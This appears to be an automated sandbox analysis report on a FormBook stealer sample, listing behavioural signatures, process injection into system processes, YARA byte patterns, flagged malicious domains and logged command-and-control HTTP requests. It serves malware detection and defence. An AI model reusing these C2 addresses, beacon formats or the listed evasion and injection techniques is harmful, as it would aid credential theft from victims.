Edit tour

Windows Analysis Report
150-425-2024.exe

Overview

General Information

Sample name:	150-425-2024.exe
Analysis ID:	1432025
MD5:	c93c9f74b4f78e098f297fd4dafff423
SHA1:	f516c24f73d9448263a4b3f12145d05ab2019c07
SHA256:	7176ddc82577be37240e7842e497ed7a16af40ff27cf8db62439422f93994c47
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

150-425-2024.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\150-425-2024.exe" MD5: C93C9F74B4F78E098F297FD4DAFFF423)

svchost.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\150-425-2024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe (PID: 6092 cmdline: "C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 7540 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe (PID: 824 cmdline: "C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7972 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x8cb6c7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8b4d66:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x8cb6c7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8b4d66:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.600000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.600000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.600000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.600000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\150-425-2024.exe", CommandLine: "C:\Users\user\Desktop\150-425-2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\150-425-2024.exe", ParentImage: C:\Users\user\Desktop\150-425-2024.exe, ParentProcessId: 7420, ParentProcessName: 150-425-2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\150-425-2024.exe", ProcessId: 7480, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\150-425-2024.exe", CommandLine: "C:\Users\user\Desktop\150-425-2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\150-425-2024.exe", ParentImage: C:\Users\user\Desktop\150-425-2024.exe, ParentProcessId: 7420, ParentProcessName: 150-425-2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\150-425-2024.exe", ProcessId: 7480, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.empowermedeco.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/	Avira URL Cloud: Label: phishing
Source: http://www.magmadokum.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.antonio-vivaldi.mobi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGRXwZUnYA2j0639iiTYeQFS7gKg6A==&-LXd8=qhq0rNepS	Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?OVFPBtpp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&-LXd8=qhq0rNepS	Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/?OVFPBtpp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==&-LXd8=qhq0rNepS	Avira URL Cloud: Label: malware
Source: http://www.antonio-vivaldi.mobi/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com	Avira URL Cloud: Label: malware
Source: https://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?OVFPBtpp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==&-LXd8=qhq0rNepS	Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/?OVFPBtpp=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/D+TcC9TMB/RoFCEllCpPhJWUqMeQ==&-LXd8=qhq0rNepS	Avira URL Cloud: Label: phishing
Source: http://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&-LXd8=qhq0rNepS	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: empowermedeco.com	Virustotal: Detection: 10%	Perma Link
Source: www.660danm.top	Virustotal: Detection: 10%	Perma Link
Source: www.antonio-vivaldi.mobi	Virustotal: Detection: 10%	Perma Link
Source: www.rssnewscast.com	Virustotal: Detection: 9%	Perma Link
Source: www.techchains.info	Virustotal: Detection: 9%	Perma Link
Source: www.elettrosistemista.zip	Virustotal: Detection: 5%	Perma Link
Source: www.donnavariedades.com	Virustotal: Detection: 5%	Perma Link
Source: www.empowermedeco.com	Virustotal: Detection: 5%	Perma Link
Source: www.magmadokum.com	Virustotal: Detection: 9%	Perma Link
Source: http://www.empowermedeco.com/fo8o/	Virustotal: Detection: 7%	Perma Link
Source: http://www.rssnewscast.com/fo8o/	Virustotal: Detection: 7%	Perma Link
Source: http://www.magmadokum.com/fo8o/	Virustotal: Detection: 6%	Perma Link
Source: http://www.660danm.top/fo8o/	Virustotal: Detection: 9%	Perma Link
Source: http://www.antonio-vivaldi.mobi/fo8o/	Virustotal: Detection: 7%	Perma Link
Source: http://www.empowermedeco.com	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for submitted file

Source: 150-425-2024.exe	ReversingLabs: Detection: 47%
Source: 150-425-2024.exe	Virustotal: Detection: 28%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: 150-425-2024.exe

Joe Sandbox ML: detected

Source: 150-425-2024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505609494.00000000006BE000.00000002.00000001.01000000.00000004.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1655891040.00000000006BE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: 150-425-2024.exe, 00000000.00000003.1447380115.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 150-425-2024.exe, 00000000.00000003.1444736163.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491506539.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489430739.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.000000000340E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.0000000003270000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1587522806.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1584000279.0000000002F12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 150-425-2024.exe, 00000000.00000003.1447380115.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 150-425-2024.exe, 00000000.00000003.1444736163.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1491506539.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489430739.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3917880903.000000000340E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.0000000003270000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1587522806.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1584000279.0000000002F12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1583975523.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548871766.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914413395.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3910307845.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3918311897.000000000389C000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656364665.0000000002F8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1874354603.000000003887C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3910307845.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3918311897.000000000389C000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656364665.0000000002F8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1874354603.000000003887C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1583975523.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548871766.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914413395.0000000000B98000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C24696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C24696
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C2C9C7
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2C93C FindFirstFileW,FindClose,	0_2_00C2C93C
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C2F200
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C2F35D
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C2F65E
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C23A2B
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C23D4E
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C2BF27
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A1BAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_00A1BAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax		4_2_00A09480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi		4_2_00A0DD45

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: unknown

Network traffic detected: IP country count 11

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 195.110.124.133 195.110.124.133

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00C325E2

Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOK51Mgi6ytQL9yeTtlbiBUAmNTsA==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGRXwZUnYA2j0639iiTYeQFS7gKg6A==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa4RxULGVWJLXVKOGZXf4u2rY2O36g==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
